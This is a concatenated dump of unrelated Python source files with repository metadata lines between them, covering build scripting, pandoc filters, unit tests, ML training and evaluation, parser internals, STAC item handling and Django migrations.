                              # 'CROSS_SUFFIX=x86_64-w64-mingw32-'
                              ]
        # If needed. See TargetList.txt in OpenBLAS directory for list of targets
        if self.is_atom():
            self.compile_args += ['TARGET=ATOM']
        else:
            # hardcoded because it failed to compile when detecting for itself
            self.compile_args += ['TARGET=CORE2']
        # self.compile_args = ['make',
        #                      'all',
        #                      'BLASLIB=%s' % (self.libname),
        #                      'OPTS="-O3 -fomit-frame-pointer -funroll-loops"'
        #                      ]  # not parallel safe
        self.install_args += ['PREFIX=%s' % (self.prefix_dir)
                              ]

    def is_atom(self):
        """Return True when /proc/cpuinfo reports the one known Atom-class CPU
        (Celeron N2940); always False on non-Linux platforms."""
        lines = []
        if platform == "linux" or platform == "linux2":
            with open('/proc/cpuinfo', 'rt') as f:
                lines = f.readlines()
        for line in lines:
            if line.startswith('model name'):
                # NOTE(review): the slice uses len('model_name'), which only
                # matches 'model name' because both are the same length —
                # confirm the intended prefix handling before touching this.
                model = line[len('model_name'):].strip()
                model = model[2:]
                if 'Intel(R) Celeron(R) CPU N2940' in model:
                    return True
                break
        return False

    def patch(self):
        """Rewrite Makefile.prebuild so the getarch / getarch_2nd detection
        helpers (built as Windows binaries) are executed through wine64."""
        self.log_dir('patch', self.directory, 'patching getarch')
        filename = os.path.join(self.directory, 'Makefile.prebuild')
        src = './getarch_2nd'
        dst = '%s/../bin/wine64 ./getarch_2nd' % self.prefix_dir
        patch(filename, src, dst)
        src = './getarch '
        dst = '%s/../bin/wine64 ./getarch ' % self.prefix_dir
        patch(filename, src, dst)

    def configure(self):
        # OpenBLAS has no configure step; make is driven directly.
        pass
| 2.03125 | 2 |
examples/theorem.py | fractaledmind/pandocfilters | 1 | 12766358 | #!/usr/bin/env python
"""
Pandoc filter to convert divs with class="theorem" to LaTeX
theorem environments in LaTeX output, and to numbered theorems
in HTML output.
"""
from pandocfilters import toJSONFilter, RawBlock, Div
# Global counter giving each rendered theorem a sequential number (HTML output).
theoremcount = 0
def latex(x):
    """Wrap string *x* as a raw LaTeX block for the pandoc AST."""
    return RawBlock('latex', x)
def html(x):
    """Wrap string *x* as a raw HTML block for the pandoc AST."""
    return RawBlock('html', x)
def theorems(key, value, format, meta):
    """Pandoc filter action: convert Divs with class "theorem" to LaTeX
    theorem environments (latex output) or numbered definition lists
    (html/html5 output). Returns None for all other elements, leaving them
    unchanged."""
    if key == 'Div':
        [[ident, classes, kvs], contents] = value
        if "theorem" in classes:
            if format == "latex":
                if ident == "":
                    label = ""
                else:
                    label = '\\label{' + ident + '}'
                return ([latex('\\begin{theorem}' + label)] + contents +
                        [latex('\\end{theorem}')])
            elif format == "html" or format == "html5":
                global theoremcount
                theoremcount = theoremcount + 1
                # BUG FIX: the closing </dl> previously had no matching
                # opening tag, producing unbalanced HTML; open the definition
                # list before the <dt>.
                newcontents = [html('<dl>\n<dt>Theorem ' + str(theoremcount) + '</dt>'),
                               html('<dd>')] + contents + [html('</dd>\n</dl>')]
                return Div([ident, classes, kvs], newcontents)
if __name__ == "__main__":
    # Run as a pandoc JSON filter: read the AST on stdin, apply theorems,
    # and write the transformed AST to stdout.
    toJSONFilter(theorems)
| 3.203125 | 3 |
template/tests/test_calc_mass.py | ajmaurais/peptide_analyzer | 0 | 12766359 | <filename>template/tests/test_calc_mass.py
import unittest
from collections import Counter
import load_dat
import std_functions
from molecular_formula import calc_mass
class TestCalcMass(unittest.TestCase):
    """Checks calc_mass against the reference masses in load_dat.dat_std."""

    def test_calc_mass(self):
        # Each reference row carries a peptide sequence ('seq') and its
        # expected mass ('mass'); the formula is built with the reference
        # implementation and its mass compared to calc_mass's result.
        for i, row in load_dat.dat_std.iterrows():
            self.assertAlmostEqual(float(row['mass']),
                                   calc_mass(std_functions.calc_formula(row['seq'],
                                                                        load_dat.atom_counts)))
if __name__ == '__main__':
    # Verbosity 2 prints one line per test method.
    unittest.main(verbosity=2)
| 2.46875 | 2 |
gan/train.py | TIBHannover/formula_gan | 6 | 12766360 | <reponame>TIBHannover/formula_gan
import sys
import os
import re
import argparse
import logging
import torch
from pytorch_lightning import Trainer
import wap_model
import formula_model
from config import Config
def main():
    """Build the formula-OCR GAN model from the project Config and train it."""
    config = Config()
    # Debug echoes of the parsed configuration (nested and flattened forms).
    print(config.to_args())
    print(vars(config.to_flat_args()))
    model = formula_model.FormulaOCR(config.to_args(), flat_params=config.to_flat_args())
    # most basic trainer, uses good defaults
    trainer = Trainer()
    trainer.fit(model)
if __name__ == "__main__":
    # main() returns None, so the process exit status is 0 on success.
    sys.exit(main())
| 2.34375 | 2 |
src/satyrus/types/base.py | pedromxavier/Satyrus3 | 1 | 12766361 | <filename>src/satyrus/types/base.py
"""
"""
# Future Imports
from __future__ import annotations
# Local
from ..satlib import Source, Posiform
from ..symbols import T_NOT, T_AND, T_OR, T_XOR, T_IMP, T_IFF, T_RIMP, T_EQ, T_NE, T_LT, T_LE, T_GT, T_GE, T_IDX, T_ADD, T_SUB, T_DIV, T_MUL, T_NEG
class MetaSatType(type):
    """Metaclass that wires the Number and Expr classes onto SatType.

    The first class created with the name 'SatType' is remembered in
    base_type; later classes named 'Number' or 'Expr' are attached to it as
    attributes (SatType.Number / SatType.Expr) instead of becoming independent
    top-level types. Any other class defined before SatType is rejected.
    """

    # Shared slot holding the single SatType base class once created.
    base_type = None

    def __new__(cls, name: str, bases: tuple, namespace: dict):
        if cls.base_type is None:
            if name == "SatType":
                cls.base_type = type(name, bases, namespace)
                return cls.base_type
            else:
                raise NotImplementedError(f"'SatType must be implemented before '{name}'")
        else:
            if name == "Number":
                cls.base_type.Number = type(name, bases, namespace)
                return cls.base_type.Number
            elif name == "Expr":
                cls.base_type.Expr = type(name, bases, namespace)
                # -*- Some Magic -*- A-bra-ca-da-bra -*-
                # Once Expr exists, fold its generated rules into its table.
                cls.base_type.Expr.RULES.update(cls.base_type.Expr.get_rules())
                return cls.base_type.Expr
            else:
                return type(name, bases, namespace)
class SatType(metaclass=MetaSatType):
    """Root of the Satyrus runtime type hierarchy.

    Provides source-position tracking plus the symbolic operator methods
    (_AND_, _ADD_, ...), each of which builds an Expr node tagged with the
    corresponding token. The Number and Expr classes are attached to this
    class by MetaSatType when they are later defined.
    """

    def __init__(self, *, source: Source = None, lexpos: int = None):
        # Record where in the source text this object originated, or mark it
        # as synthetic (blank) when no source is supplied.
        if isinstance(source, Source):
            source.track(self, lexpos)
        elif source is None:
            Source.blank(self)
        else:
            raise TypeError(f"Invalid type '{type(source)}' for 'source' argument")

    # -*- Type predicates; subclasses override the one that applies -*-

    @property
    def is_number(self) -> bool:
        return False

    @property
    def is_array(self) -> bool:
        return False

    @property
    def is_expr(self) -> bool:
        return False

    @property
    def is_var(self) -> bool:
        return False

    # -*- Operator Definition -*-
    # :: Aliases mapping Python operators onto the symbolic constructors
    def __invert__(self):
        return self._NOT_()

    def __and__(self, other):
        return self._AND_(other)

    def __or__(self, other):
        return self._OR_(other)

    # :: Logical
    def _NOT_(self) -> SatType:
        return self.__class__.Expr(T_NOT, self)

    def _AND_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_AND, self, other)

    def _OR_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_OR, self, other)

    def _XOR_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_XOR, self, other)

    def _IMP_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_IMP, self, other)

    def _IFF_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_IFF, self, other)

    def _RIMP_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_RIMP, self, other)

    # :: Comparison
    def _EQ_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_EQ, self, other)

    def _NE_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_NE, self, other)

    def _LT_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_LT, self, other)

    def _LE_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_LE, self, other)

    def _GT_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_GT, self, other)

    def _GE_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_GE, self, other)

    # :: Indexing (i is a tuple of index expressions)
    def _IDX_(self, i: tuple) -> SatType:
        return self.__class__.Expr(T_IDX, self, *i)

    # :: Arithmetic
    def _ADD_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_ADD, self, other)

    def _SUB_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_SUB, self, other)

    def _DIV_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_DIV, self, other)

    def _MUL_(self, other: SatType) -> SatType:
        return self.__class__.Expr(T_MUL, self, other)

    def _NEG_(self) -> SatType:
        return self.__class__.Expr(T_NEG, self)
# Public API of this module.
__all__ = ["SatType"]
| 2.28125 | 2 |
evaluate.py | wmylxmj/Anime-Super-Resolution | 120 | 12766362 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 30 21:24:36 2019
@author: wmy
"""
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
from keras import backend as K
from keras.losses import mean_absolute_error, mean_squared_error
from keras.models import load_model
from keras.optimizers import Adam
import random
import os
from model import wdsr_a, wdsr_b
from utils import DataLoader
# WDSR-B super-resolution network, 4x upscale, with pretrained weights.
model = wdsr_b(scale=4, num_res_blocks=32)
model.load_weights('./weights/wdsr-b-32-x4.h5')
# Supplies HR images and the blur/downscale degradation helpers.
data_loader = DataLoader(scale=4)
def evaluate_test(model, setpath='datasets/train', difficulty='easy', name='evaluate'):
    """Qualitative SR check: degrade one random image, super-resolve it, save results.

    A random HR image from ``setpath`` is Gaussian-blurred and down/up-sampled
    (strength controlled by ``difficulty``), pushed through ``model``, and the
    low-res / super-res / high-res triplet is written to
    ``images/<name>_{lr,sr,hr}.jpg``.

    Raises:
        ValueError: if ``difficulty`` is not one of easy/normal/hard/lunatic.
    """
    # (low, high) sampling range used for both the hidden extra downscale
    # factor and the Gaussian blur radius. Replaces the old if/elif chain,
    # whose initial uniform(1, 3) defaults were dead code (every known
    # difficulty overwrote them, unknown ones raised).
    difficulty_ranges = {
        'easy': (1, 1.5),
        'normal': (1.5, 2),
        'hard': (2, 2.5),
        'lunatic': (2.5, 3),
    }
    if difficulty not in difficulty_ranges:
        raise ValueError("unknown difficulty")
    low, high = difficulty_ranges[difficulty]
    images = data_loader.search(setpath)
    image = random.choice(images)
    hr = data_loader.imread(image)
    resize = (hr.size[0] // data_loader.scale, hr.size[1] // data_loader.scale)
    hidden_scale = random.uniform(low, high)
    radius = random.uniform(low, high)
    hidden_resize = (int(resize[0] / hidden_scale), int(resize[1] / hidden_scale))
    # Degrade: blur, shrink below the target LR size, then resize back up to LR.
    lr = data_loader.gaussianblur(hr, radius)
    lr = lr.resize(hidden_resize)
    lr = lr.resize(resize)
    lr_resize = lr.resize(hr.size)  # naively-upscaled LR, saved for visual comparison
    lr = np.asarray(lr)
    sr = model.predict(np.array([lr]))[0]
    sr = np.clip(sr, 0, 255).astype('uint8')
    sr = Image.fromarray(sr)
    lr_resize.save("images/" + name + "_lr.jpg")
    sr.save("images/" + name + "_sr.jpg")
    hr.save("images/" + name + "_hr.jpg")
# One qualitative sample per difficulty level; outputs land in ./images/.
evaluate_test(model, difficulty='easy', name='easy')
evaluate_test(model, difficulty='normal', name='normal')
evaluate_test(model, difficulty='hard', name='hard')
evaluate_test(model, difficulty='lunatic', name='lunatic')
| 2.3125 | 2 |
Gelatin/compiler/Context.py | Etherbay/Gelatin | 107 | 12766363 | <filename>Gelatin/compiler/Context.py
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import codecs
def do_next(context):
    """Grammar action ``do.next``: returns 0 (proceed with the next statement)."""
    return 0
def do_skip(context):
    """Grammar action ``do.skip``: returns 1 (skip — interpreted by the matcher)."""
    return 1
def do_fail(context, message='No matching statement found'):
    """Grammar action ``do.fail``: abort parsing with an error at the current position."""
    context._error(message)
def do_say(context, message):
    """Grammar action ``do.say``: print *message* annotated with the source location."""
    context._msg(message)
    return 0
def do_warn(context, message):
    """Grammar action ``do.warn``: write *message* (with source location) to stderr."""
    context._warn(message)
    return 0
def do_return(context, levels=1):
    """Grammar action ``do.return``: return from ``levels`` enclosing grammars.

    The negative integer return value tells the matcher how many grammar
    levels to pop (mirrors do_next/do_skip, which return 0 and 1).
    """
    return -levels
def out_create(context, path, data=None):
    """``out.create``: create *path* in the output, firing queued on-add triggers."""
    # print "out.create():", path, data
    context.builder.create(path, data)
    context.builder.enter(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.builder.leave()
    return 0
def out_replace(context, path, data=None):
    """``out.replace``: add *path*, replacing any existing node, then fire on-add triggers."""
    # print "out.replace():", path, data
    context.builder.add(path, data, replace=True)
    context.builder.enter(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.builder.leave()
    return 0
def out_add(context, path, data=None):
    """``out.add``: add *path* (with optional data) and fire queued on-add triggers."""
    # print "out.add():", path, data
    context.builder.add(path, data)
    context.builder.enter(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.builder.leave()
    return 0
def out_add_attribute(context, path, name, value):
    """``out.add_attribute``: set attribute *name*=*value* on the node at *path*."""
    # print "out.add_attribute():", path, name, value
    context.builder.add_attribute(path, name, value)
    context.builder.enter(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.builder.leave()
    return 0
def out_open(context, path):
    """``out.open``: open *path* and stay inside it; leave() is deferred until
    the current grammar statement is left (via its on_leave queue)."""
    # print "out.open():", path
    context.builder.open(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.stack[-1].on_leave.append((context.builder.leave, ()))
    return 0
def out_enter(context, path):
    """``out.enter``: like out_open, but enters an existing node at *path*."""
    # print "out.enter():", path
    context.builder.enter(path)
    context._trigger(context.on_add, context.re_stack[-1])
    context.stack[-1].on_leave.append((context.builder.leave, ()))
    return 0
def out_enqueue_before(context, regex, path, data=None):
    """``out.enqueue_before``: run out_add(path, data) just before the next match of *regex*."""
    # print "ENQ BEFORE", regex.pattern, path, data
    context.on_match_before.append((regex, out_add, (context, path, data)))
    return 0
def out_enqueue_after(context, regex, path, data=None):
    """``out.enqueue_after``: run out_add(path, data) just after the next match of *regex*."""
    # print "ENQ AFTER", regex.pattern, path, data
    context.on_match_after.append((regex, out_add, (context, path, data)))
    return 0
def out_enqueue_on_add(context, regex, path, data=None):
    """``out.enqueue_on_add``: run out_add(path, data) when a node matching *regex* is added."""
    # print "ENQ ON ADD", regex.pattern, path, data
    context.on_add.append((regex, out_add, (context, path, data)))
    return 0
def out_clear_queue(context):
    """``out.clear_queue``: drop every queued trigger. Returns 1, unlike the other out.* actions."""
    context._clear_triggers()
    return 1
def out_set_root_name(context, name):
    """``out.set_root_name``: rename the root node of the output document."""
    context.builder.set_root_name(name)
    return 0
class Context(object):
    """Parser state for a Gelatin run.

    Holds the grammar/function tables, the input text, the output builder,
    the current parse position (``start``) and the trigger queues used by the
    ``out.enqueue_*`` actions.
    """
    def __init__(self):
        # Maps the grammar-language action names to their Python handlers.
        self.functions = {'do.fail': do_fail,
                          'do.return': do_return,
                          'do.next': do_next,
                          'do.skip': do_skip,
                          'do.say': do_say,
                          'do.warn': do_warn,
                          'out.create': out_create,
                          'out.replace': out_replace,
                          'out.add': out_add,
                          'out.add_attribute': out_add_attribute,
                          'out.open': out_open,
                          'out.enter': out_enter,
                          'out.enqueue_before': out_enqueue_before,
                          'out.enqueue_after': out_enqueue_after,
                          'out.enqueue_on_add': out_enqueue_on_add,
                          'out.clear_queue': out_clear_queue,
                          'out.set_root_name': out_set_root_name}
        self.lexicon = {}
        self.grammars = {}
        self.input = None
        self.builder = None
        self.end = 0
        self._init()
    def _init(self):
        """Reset per-parse state (position, stacks, trigger queues)."""
        self.start = 0
        self.re_stack = []
        self.stack = []
        self._clear_triggers()
    def _clear_triggers(self):
        """Empty all three trigger queues."""
        self.on_match_before = []
        self.on_match_after = []
        self.on_add = []
    def _trigger(self, triggers, match):
        """Fire (and remove) every queued trigger whose regex matches *match*.

        Removal happens before invocation so a fired trigger cannot re-fire
        recursively from within its own handler.
        """
        matching = []
        for trigger in triggers:
            regex, func, args = trigger
            if regex.search(match.group(0)) is not None:
                matching.append(trigger)
        for trigger in matching:
            triggers.remove(trigger)
        for trigger in matching:
            regex, func, args = trigger
            func(*args)
    def _match_before_notify(self, match):
        """Called just before a statement match is processed."""
        self.re_stack.append(match)
        self._trigger(self.on_match_before, match)
    def _match_after_notify(self, match):
        """Called just after a statement match has been processed."""
        self._trigger(self.on_match_after, match)
        self.re_stack.pop()
    def _get_lineno(self):
        """1-based line number of the current parse position."""
        return self.input.count('\n', 0, self.start) + 1
    def _get_line(self, number=None):
        """Return the text of line *number* (default: the current line)."""
        if number is None:
            number = self._get_lineno()
        return self.input.split('\n')[number - 1]
    def _get_line_position_from_char(self, char):
        """Return (line_start, line_end) character offsets around *char*."""
        line_start = char
        while line_start != 0:
            if self.input[line_start - 1] == '\n':
                break
            line_start -= 1
        line_end = self.input.find('\n', char)
        return line_start, line_end
    def _format(self, error):
        """Format *error* with the offending line and a caret marker.

        NOTE(review): token_len is hard-coded to 1, so the else-branch
        (the '----' underline) is currently unreachable.
        """
        start, end = self._get_line_position_from_char(self.start)
        line_number = self._get_lineno()
        line = self._get_line()
        offset = self.start - start
        token_len = 1
        output = line + '\n'
        if token_len <= 1:
            output += (' ' * offset) + '^\n'
        else:
            output += (' ' * offset) + "'" + ('-' * (token_len - 2)) + "'\n"
        output += '%s in line %s' % (error, line_number)
        return output
    def _msg(self, error):
        """Print an informational message with source context."""
        print(self._format(error))
    def _warn(self, error):
        """Write a warning with source context to stderr."""
        sys.stderr.write(self._format(error) + '\n')
    def _error(self, error):
        """Raise an Exception carrying the formatted source context."""
        raise Exception(self._format(error))
    def _eof(self):
        """True once the parse position has reached the end of the input."""
        return self.start >= self.end
    def parse_string(self, input, builder, debug=0):
        """Parse *input* using the 'input' grammar, emitting via *builder*.

        Raises if the grammar returns before consuming the whole input.
        """
        self._init()
        self.input = input
        self.builder = builder
        self.end = len(input)
        self.grammars['input'].parse(self, debug)
        if self.start < self.end:
            self._error('parser returned, but did not complete')
    def parse(self, filename, builder, encoding='utf8', debug=0):
        """Read *filename* with the given encoding and parse its contents."""
        with codecs.open(filename, 'r', encoding=encoding) as input_file:
            return self.parse_string(input_file.read(), builder, debug)
    def dump(self):
        """Print every registered grammar (debugging aid)."""
        for grammar in self.grammars.values():
            print(grammar)
| 2.0625 | 2 |
MxForum/tools/dec_test.py | mtianyan/TornadoForum | 2 | 12766364 | <reponame>mtianyan/TornadoForum
# 装饰器是什么样的
# 装饰器加载过程
import functools
import time
def time_dec(func):
    """Decorator that prints the wall-clock duration of each call to ``func``.

    functools.wraps preserves the wrapped function's name/docstring.
    """
    print("dec started")  # runs once, at decoration time
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        start_time = time.time()
        result = func(*args, **kwargs)
        end_time = time.time()
        print("last_time:{}".format(end_time - start_time))
        # Bug fix: the original wrapper discarded func's return value,
        # so every decorated function effectively returned None.
        return result
    return wrapper
@time_dec
def add(a, b):
    """Return a + b after sleeping 3 s, so the decorator's timing is visible."""
    time.sleep(3)
    return a + b
if __name__ == "__main__":
    # 1. Why does an error raised when calling add() report "wrapper"?
    # 2. How do the arguments get forwarded into wrapper?
    print(add(1, 2))
| 3.328125 | 3 |
examples/test_context.py | stephenpardy/scopr | 0 | 12766365 | <reponame>stephenpardy/scopr<filename>examples/test_context.py
from scopr import scope
a = 1
def test():
    return "Hello, World!"
# Inside scope(): rebind a, shadow test(), and introduce b.
# Presumably scope() restores/undoes these bindings on exit — the prints
# below the block check exactly that (TODO confirm against scopr docs).
with scope():
    b = 1
    a = 2
    def test():
        return "Goodbye, World!"
    print(test())
    print("a: {}".format(a))
print(test())
print("b: {}".format(b))
| 2.890625 | 3 |
project1.py | chanseeliu/jupyter-notebook | 0 | 12766366 | <filename>project1.py<gh_stars>0
# Scale a list of numbers by 1000 and print the results, then a
# tab-joined string form. Ported from Python-2 `print` statements,
# which are a SyntaxError under Python 3.
numbers = [1, 2, 3, 4, 5, 6]
bignumbers = [a * 1000 for a in numbers]
bign = [str(item) for item in bignumbers]
print(bignumbers)
print(bign)
# bign already holds strings, so no per-item str() conversion is needed.
print("\t".join(bign))
| 3.0625 | 3 |
satstac/item.py | JamesOConnor/sat-stac | 1 | 12766367 | import json
import logging
import os
import traceback
from string import Formatter, Template
from datetime import datetime
from dateutil.parser import parse as dateparse
from satstac import __version__, STACError, Thing, utils
logger = logging.getLogger(__name__)
class Item(Thing):
    """A STAC Item: one scene with geometry, properties, assets and links.

    Property lookups fall back to the Item's Collection when a key is not
    present on the Item itself.
    """
    def __init__(self, *args, **kwargs):
        """ Initialize a scene object """
        super(Item, self).__init__(*args, **kwargs)
        # dictionary of assets by eo:band common_name, built lazily
        self._assets_by_common_name = None
        # collection instance (may be injected, else resolved from links)
        self._collection = kwargs.pop('collection', None)
        # TODO = allow passing in of collection (needed for FC catalogs)

    def collection(self):
        """ Get Collection info for this item """
        if self._collection is None:
            if self.filename is None:
                # TODO - raise exception ?
                return None
            link = self.links('collection')
            if len(link) == 1:
                self._collection = Collection.open(link[0])
        return self._collection

    @property
    def eobands(self):
        """ Get eo:bands from Item or from Collection """
        if 'eo:bands' in self.properties:
            return self.properties['eo:bands']
        elif self.collection() is not None and 'eo:bands' in self.collection().properties:
            return self.collection()['eo:bands']
        return []

    @property
    def properties(self):
        """ Get dictionary of properties """
        return self._data.get('properties', {})

    def __getitem__(self, key):
        """ Get key from properties, falling back to the Collection """
        val = super(Item, self).__getitem__(key)
        if val is None:
            if self.collection() is not None:
                # load properties from Collection
                val = self._collection[key]
        return val

    @property
    def date(self):
        """ Acquisition date (no time component) """
        return self.datetime.date()

    @property
    def datetime(self):
        """ Acquisition datetime parsed from the 'datetime' property """
        return dateparse(self['datetime'])

    @property
    def geometry(self):
        """ GeoJSON geometry of the scene """
        return self._data['geometry']

    @property
    def bbox(self):
        """ Get bounding box of scene """
        return self._data['bbox']

    @property
    def assets(self):
        """ Return dictionary of assets """
        return self._data.get('assets', {})

    @property
    def assets_by_common_name(self):
        """ Get assets by common band name (only works for assets containing 1 band) """
        if self._assets_by_common_name is None:
            # Bug fix: always cache (and return) a dict. Previously this
            # stayed None when no eo:bands were defined, which made
            # `key in self.assets_by_common_name` in asset() raise TypeError.
            self._assets_by_common_name = {}
            if len(self.eobands) > 0:
                for a in self.assets:
                    bands = self.assets[a].get('eo:bands', [])
                    if len(bands) == 1:
                        eo_band = self.eobands[bands[0]].get('common_name')
                        if eo_band:
                            self._assets_by_common_name[eo_band] = self.assets[a]
        return self._assets_by_common_name

    def asset(self, key):
        """ Get asset for this key OR common_name """
        if key in self.assets:
            return self.assets[key]
        elif key in self.assets_by_common_name:
            return self.assets_by_common_name[key]
        # use the module logger for consistency with download()
        logger.warning('No such asset (%s)' % key)
        return None

    def get_filename(self, path='', filename='${id}', extension='.json'):
        """ Get complete path with filename to this item """
        return os.path.join(
            self.substitute(path),
            self.substitute(filename) + extension
        )

    def substitute(self, string):
        """ Substitute ${key} patterns in string with this Item's values.

        ':' in keys is temporarily mapped to '_colon_' because it is not a
        valid identifier character for string.Template/Formatter fields.
        """
        string = string.replace(':', '_colon_')
        subs = {}
        for key in [i[1] for i in Formatter().parse(string.rstrip('/')) if i[1] is not None]:
            if key == 'id':
                subs[key] = self.id
            elif key in ['date', 'year', 'month', 'day']:
                vals = {'date': self.date, 'year': self.date.year, 'month': self.date.month, 'day': self.date.day}
                subs[key] = vals[key]
            else:
                subs[key] = self[key.replace('_colon_', ':')]
        return Template(string).substitute(**subs)

    def download_assets(self, keys=None, **kwargs):
        """ Download multiple assets; returns list of local filenames (or None entries) """
        if keys is None:
            keys = self._data['assets'].keys()
        filenames = []
        for key in keys:
            filenames.append(self.download(key, **kwargs))
        return filenames

    def download(self, key, overwrite=False, path='', filename='${id}', requestor_pays=False):
        """ Download this key (e.g., a band, or metadata file) from the scene.

        Returns the local filename, the pre-existing file when not
        overwriting, or None on failure (errors are logged, not raised).
        """
        asset = self.asset(key)
        if asset is None:
            return None
        _path = self.substitute(path)
        utils.mkdirp(_path)
        _filename = None
        try:
            fname = self.substitute(filename)
            ext = os.path.splitext(asset['href'])[1]
            fout = os.path.join(_path, fname + '_' + key + ext)
            if not os.path.exists(fout) or overwrite:
                _filename = utils.download_file(asset['href'], filename=fout, requestor_pays=requestor_pays)
            else:
                _filename = fout
        except Exception as e:
            _filename = None
            logger.error('Unable to download %s: %s' % (asset['href'], str(e)))
            logger.debug(traceback.format_exc())
        return _filename

    # NOTE: a long-dead, commented-out create_derived() classmethod
    # (kept here as a triple-quoted string) was removed; see VCS history.
# import and end of module prevents problems with circular dependencies.
# Catalogs use Items and Items use Collections (which are Catalogs)
from .collection import Collection | 2.375 | 2 |
examples/consts/linewidth.py | strakam/PyEasyGraphics | 5 | 12766368 | <filename>examples/consts/linewidth.py
from easygraphics import *
def main():
    """Draw two crossing diagonals to demonstrate set_line_width()."""
    init_graph(800, 600)
    line(50, 50, 400, 400)  # default (thin) line width
    set_line_width(20)
    line(50, 400, 400, 50)  # mirrored diagonal, 20 px wide
    pause()
    close_graph()
easy_run(main) | 2.078125 | 2 |
tukiogram/migrations/0005_auto_20170319_2103.py | charitymbaka/samaritan-final | 0 | 12766369 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-19 18:03
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: make Tukio.location_geom a unique PointField (SRID 4326)."""

    dependencies = [
        ('tukiogram', '0004_auto_20170316_1435'),
    ]

    operations = [
        migrations.AlterField(
            model_name='tukio',
            name='location_geom',
            field=django.contrib.gis.db.models.fields.PointField(srid=4326, unique=True),
        ),
    ]
| 1.445313 | 1 |
excel_dates/__init__.py | AutoActuary/excel-dates | 8 | 12766370 | from .convert import *
| 1.21875 | 1 |
webdev/vendas/migrations/0003_auto_20210530_1548.py | h-zanetti/jewelry-manager | 0 | 12766371 | # Generated by Django 3.1.5 on 2021-05-30 18:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: make Venda.receita a nullable OneToOne with SET_NULL."""

    dependencies = [
        ('financeiro', '0021_auto_20210530_1434'),
        ('vendas', '0002_auto_20210528_1954'),
    ]

    operations = [
        migrations.AlterField(
            model_name='venda',
            name='receita',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='financeiro.receita', verbose_name='Receita'),
        ),
    ]
| 1.265625 | 1 |
Ago-Dic-2019/Ricardo_Romero_Medina/Practica1/Practica_4-7.py | Arbupa/DAS_Sistemas | 41 | 12766372 | <filename>Ago-Dic-2019/Ricardo_Romero_Medina/Practica1/Practica_4-7.py
# Print the multiples of 3 from 3 up to 30, one per line.
numbers = list(range(3, 31, 3))
# Iterate the values directly instead of `for i in range(len(numbers))`.
for number in numbers:
    print(number)
research/part04_application_to_rl/e01_learn_xy_representations/_util.py | nmichlo/msc-research | 1 | 12766373 | <reponame>nmichlo/msc-research<filename>research/part04_application_to_rl/e01_learn_xy_representations/_util.py
# ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
# MIT License
#
# Copyright (c) 2022 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
import logging
import sys
from typing import Optional
import psutil
log = logging.getLogger(__name__)
# ========================================================================= #
# Helper #
# ========================================================================= #
